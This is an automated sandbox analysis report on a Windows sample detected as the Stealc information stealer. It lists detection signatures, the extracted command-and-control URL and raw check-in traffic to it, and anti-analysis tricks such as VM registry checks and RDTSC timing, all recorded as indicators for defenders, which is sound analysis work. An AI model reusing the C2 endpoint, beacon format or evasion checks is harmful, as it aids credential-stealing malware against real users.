Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1521407
MD5:5afadfe8ee15c31905dbd4fd8d0cc47d
SHA1:ad98ad6e22aa75fe869344932022507386c159aa
SHA256:fb8269dae16f59cb0f20bed8792e9a497e019b6d21c489114616f2c46d1db396
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 3808 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 5AFADFE8EE15C31905DBD4FD8D0CC47D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1743203944.000000000120E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000003.1702267630.00000000050B0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 3808JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 3808JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.710000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-28T08:56:09.120222+020020442431Malware Command and Control Activity Detected192.168.2.449730185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Found malware configuration
                Source: 0.2.file.exe.710000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0071C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_0071C820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00717240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00717240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00719AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00719AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00719B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00719B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00728EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00728EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007238B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_007238B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00724910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00724910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0071DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0071DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0071E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0071E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00724570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00724570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0071ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0071ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0071BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0071BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0071DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0071DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007116D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_007116D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0071F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0071F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00723EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00723EA0

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIIDBKJJDGHDHJKEHJDBHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 49 44 42 4b 4a 4a 44 47 48 44 48 4a 4b 45 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 43 34 43 46 34 33 34 32 34 45 42 33 32 39 34 35 36 34 35 34 37 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 44 42 4b 4a 4a 44 47 48 44 48 4a 4b 45 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 44 42 4b 4a 4a 44 47 48 44 48 4a 4b 45 48 4a 44 42 2d 2d 0d 0a Data Ascii: ------FIIDBKJJDGHDHJKEHJDBContent-Disposition: form-data; name="hwid"9C4CF43424EB3294564547------FIIDBKJJDGHDHJKEHJDBContent-Disposition: form-data; name="build"save------FIIDBKJJDGHDHJKEHJDB--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00714880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00714880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIIDBKJJDGHDHJKEHJDBHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 49 44 42 4b 4a 4a 44 47 48 44 48 4a 4b 45 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 43 34 43 46 34 33 34 32 34 45 42 33 32 39 34 35 36 34 35 34 37 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 44 42 4b 4a 4a 44 47 48 44 48 4a 4b 45 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 44 42 4b 4a 4a 44 47 48 44 48 4a 4b 45 48 4a 44 42 2d 2d 0d 0a Data Ascii: ------FIIDBKJJDGHDHJKEHJDBContent-Disposition: form-data; name="hwid"9C4CF43424EB3294564547------FIIDBKJJDGHDHJKEHJDBContent-Disposition: form-data; name="build"save------FIIDBKJJDGHDHJKEHJDB--
                Source: file.exe, 00000000.00000002.1743203944.000000000120E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.1743203944.0000000001268000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1743203944.000000000120E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.1743203944.0000000001268000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.1743203944.0000000001268000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php)q
                Source: file.exe, 00000000.00000002.1743203944.0000000001268000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php=qj
                Source: file.exe, 00000000.00000002.1743203944.0000000001268000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpT
                Source: file.exe, 00000000.00000002.1743203944.0000000001268000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/ws
                Source: file.exe, 00000000.00000002.1743203944.000000000120E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37s

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AD68B20_2_00AD68B2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A508ED0_2_00A508ED
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A268E80_2_00A268E8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A840D80_2_00A840D8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009E00150_2_009E0015
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AD18190_2_00AD1819
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ACE86D0_2_00ACE86D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099D0760_2_0099D076
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ADA05D0_2_00ADA05D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DA41D10_2_00DA41D1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009FF1EB0_2_009FF1EB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AE59400_2_00AE5940
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A8B2E10_2_00A8B2E1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ADD30D0_2_00ADD30D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AD83750_2_00AD8375
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ADF4B30_2_00ADF4B3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AC24040_2_00AC2404
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AE24040_2_00AE2404
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009D5DDD0_2_009D5DDD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AF25FB0_2_00AF25FB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009B45510_2_009B4551
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AE16A00_2_00AE16A0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AE3E890_2_00AE3E89
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AD3F3D0_2_00AD3F3D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ADBF3F0_2_00ADBF3F
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 007145C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: shkwfujq ZLIB complexity 0.9949712233637747
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00729600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00729600
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00723720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00723720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Q2IEG55W.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1838080 > 1048576
                Source: file.exeStatic PE information: Raw size of shkwfujq is bigger than: 0x100000 < 0x19aa00

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.710000.0.unpack :EW;.rsrc :W;.idata :W; :EW;shkwfujq:EW;jdqxiqxa:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;shkwfujq:EW;jdqxiqxa:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00729860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00729860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1c417d should be: 0x1cf740
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: shkwfujq
                Source: file.exeStatic PE information: section name: jdqxiqxa
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B760B5 push edi; mov dword ptr [esp], 03891EBAh0_2_00B76112
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A3895 push ebp; mov dword ptr [esp], edx0_2_009A3986
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A3895 push 69EEF532h; mov dword ptr [esp], ebx0_2_009A3994
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AD68B2 push 51F89DF1h; mov dword ptr [esp], ebp0_2_00AD68BB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AD68B2 push 2944B0E6h; mov dword ptr [esp], edx0_2_00AD68C5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AD68B2 push eax; mov dword ptr [esp], 3763B579h0_2_00AD68CC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AD68B2 push edx; mov dword ptr [esp], ebp0_2_00AD69D2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AD68B2 push 37A2822Eh; mov dword ptr [esp], edx0_2_00AD69FA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AD68B2 push esi; mov dword ptr [esp], 3812CEA0h0_2_00AD6A0A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AD68B2 push eax; mov dword ptr [esp], 15ED7666h0_2_00AD6A89
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AD68B2 push 2A894D8Fh; mov dword ptr [esp], ebp0_2_00AD6A98
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AD68B2 push 642344FFh; mov dword ptr [esp], ecx0_2_00AD6AAB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AD68B2 push 2CAC47BAh; mov dword ptr [esp], ebx0_2_00AD6B1F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AD68B2 push 2F5BC7D1h; mov dword ptr [esp], ebx0_2_00AD6B6A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AD68B2 push 42E5AECBh; mov dword ptr [esp], edx0_2_00AD6B7F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AD68B2 push 17BD4128h; mov dword ptr [esp], eax0_2_00AD6BA8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AD68B2 push 550B5AB9h; mov dword ptr [esp], ecx0_2_00AD6BDD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AD68B2 push edi; mov dword ptr [esp], ebp0_2_00AD6C71
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AD68B2 push esi; mov dword ptr [esp], edi0_2_00AD6C75
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AD68B2 push ecx; mov dword ptr [esp], 7AFFBB96h0_2_00AD6D2E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AD68B2 push 0002B133h; mov dword ptr [esp], eax0_2_00AD6D71
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AD68B2 push 1A802CBFh; mov dword ptr [esp], ecx0_2_00AD6EF8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AD68B2 push eax; mov dword ptr [esp], esi0_2_00AD6EFE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AD68B2 push 5765F700h; mov dword ptr [esp], edi0_2_00AD6F1F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AD68B2 push 20CD7CD2h; mov dword ptr [esp], eax0_2_00AD6F3A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AD68B2 push eax; mov dword ptr [esp], edi0_2_00AD6F40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AD68B2 push eax; mov dword ptr [esp], 25F14A6Ch0_2_00AD6F46
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AD68B2 push 3E31160Bh; mov dword ptr [esp], edx0_2_00AD6FD3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AD68B2 push ecx; mov dword ptr [esp], ebp0_2_00AD6FEE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AD68B2 push ecx; mov dword ptr [esp], ebx0_2_00AD700C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AD68B2 push 5ED4BCE4h; mov dword ptr [esp], esi0_2_00AD7142
                Source: file.exeStatic PE information: section name: shkwfujq entropy: 7.954513336797254

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00729860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00729860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13561
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9725BB second address: 971E72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 jg 00007F4A81237CC6h 0x0000000b pop edx 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 je 00007F4A81237CC7h 0x00000016 stc 0x00000017 push dword ptr [ebp+122D13E1h] 0x0000001d jmp 00007F4A81237CD5h 0x00000022 call dword ptr [ebp+122D1983h] 0x00000028 pushad 0x00000029 jmp 00007F4A81237CCEh 0x0000002e xor eax, eax 0x00000030 mov dword ptr [ebp+122D1A52h], eax 0x00000036 mov dword ptr [ebp+122D1A52h], esi 0x0000003c mov edx, dword ptr [esp+28h] 0x00000040 xor dword ptr [ebp+122D1941h], esi 0x00000046 sub dword ptr [ebp+122D1941h], edx 0x0000004c mov dword ptr [ebp+122D2D78h], eax 0x00000052 jns 00007F4A81237CCDh 0x00000058 mov esi, 0000003Ch 0x0000005d cld 0x0000005e add esi, dword ptr [esp+24h] 0x00000062 jl 00007F4A81237CCEh 0x00000068 jng 00007F4A81237CC8h 0x0000006e pushad 0x0000006f popad 0x00000070 lodsw 0x00000072 cmc 0x00000073 add eax, dword ptr [esp+24h] 0x00000077 mov dword ptr [ebp+122D19A8h], esi 0x0000007d mov ebx, dword ptr [esp+24h] 0x00000081 jmp 00007F4A81237CD3h 0x00000086 nop 0x00000087 push eax 0x00000088 push edx 0x00000089 pushad 0x0000008a jns 00007F4A81237CC6h 0x00000090 push esi 0x00000091 pop esi 0x00000092 popad 0x00000093 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 971E72 second address: 971E7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F4A80B11C36h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEA96E second address: AEA98D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A81237CD7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEA98D second address: AEA991 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
